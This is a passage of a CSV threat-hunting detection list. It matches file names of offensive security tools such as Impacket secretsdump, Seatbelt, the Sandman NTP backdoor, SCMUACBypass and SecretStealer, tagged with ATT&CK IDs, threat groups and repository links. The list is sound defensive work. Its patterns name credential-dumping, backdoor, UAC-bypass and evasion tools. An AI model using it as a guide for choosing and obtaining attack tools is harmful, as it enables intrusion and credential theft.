"*\sample_brc4.json*",".{0,1000}\\sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","18272" "*\sample_sliver.json*",".{0,1000}\\sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","18273" "*\samrdump.exe*",".{0,1000}\\samrdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18274" "*\samrdump.py*",".{0,1000}\\samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18275" "*\Sandman.exe*",".{0,1000}\\Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18276" "*\sandman_server.py*",".{0,1000}\\sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18277" "*\SandmanBackdoorTimeProvider.dll*",".{0,1000}\\SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18278" 
"*\Sandman-master.zip*",".{0,1000}\\Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18279" "*\santi RAT.exe*",".{0,1000}\\santi\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18280" "*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18281" "*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18282" "*\save_reg.hive*",".{0,1000}\\save_reg\.hive.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","18283" "*\scan4all.exe*",".{0,1000}\\scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","18284" "*\scan4all-main*",".{0,1000}\\scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","18285" 
"*\scanACLsResults.csv*",".{0,1000}\\scanACLsResults\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","18286" "*\ScanInterception.ps1*",".{0,1000}\\ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18287" "*\scan-network.py*",".{0,1000}\\scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18288" "*\SchTask.sln*",".{0,1000}\\SchTask\.sln.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18290" 
"*\SchTask.zip*",".{0,1000}\\SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18291" "*\SchTask_0x727\*",".{0,1000}\\SchTask_0x727\\.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18292" "*\SchTaskBackdoor.*",".{0,1000}\\SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","18293" "*\sc-loader.exe*",".{0,1000}\\sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","18294" "*\SCMUACBypass.cpp*",".{0,1000}\\SCMUACBypass\.cpp.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","18295" "*\scmuacbypass.cpp*",".{0,1000}\\scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18296" "*\SCMUACBypass.exe*",".{0,1000}\\SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18297" "*\scmuacbypass.exe*",".{0,1000}\\scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18298" "*\SCMUACBypass.exe*",".{0,1000}\\SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18299" "*\SCMUACBypass\*",".{0,1000}\\SCMUACBypass\\.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18300" "*\ScriptBlock-Smuggling*",".{0,1000}\\ScriptBlock\-Smuggling.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18313" "*\ScriptSentry.ps1*",".{0,1000}\\ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18319" "*\ScriptSentry.psd1*",".{0,1000}\\ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18320" "*\ScriptSentry.psm1*",".{0,1000}\\ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18321" "*\ScriptSentry.txt*",".{0,1000}\\ScriptSentry\.txt.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - 
T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18322" "*\scuffy.py*",".{0,1000}\\scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18323" "*\sdb-explorer.exe*",".{0,1000}\\sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18324" "*\sdb-explorer.sln*",".{0,1000}\\sdb\-explorer\.sln.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18325" "*\SearchShares.ps1*",".{0,1000}\\SearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","18330" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - 
T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18331" "*\SeatBelt.exe*",".{0,1000}\\SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18332" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","18333" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18334" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 
- T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18335" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18336" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18337" "*\Seatbelt.sln*",".{0,1000}\\Seatbelt\.sln.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. 
system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18338" "*\Seatbelt.txt*",".{0,1000}\\Seatbelt\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","18339" "*\Seatbelt\Commands\*",".{0,1000}\\Seatbelt\\Commands\\.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18340" "*\Seatbelt\Program.cs*",".{0,1000}\\Seatbelt\\Program\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18341" "*\Seatbelt\Seatbelt.cs*",".{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18342" "*\SeAuditPrivilegePoC.exe*",".{0,1000}\\SeAuditPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18343" "*\SeBackupPrivilegePoC.exe*",".{0,1000}\\SeBackupPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18344" 
"*\SecondaryLogonVariant.exe*",".{0,1000}\\SecondaryLogonVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18345" "*\secretsdump.exe*",".{0,1000}\\secretsdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18346" "*\secretsdump.py*",".{0,1000}\\secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18347" "*\secretsdump.py*",".{0,1000}\\secretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","18348" "*\secretsmanagerenum.py*",".{0,1000}\\secretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18349" "*\SecretStealer.ps1*",".{0,1000}\\SecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - 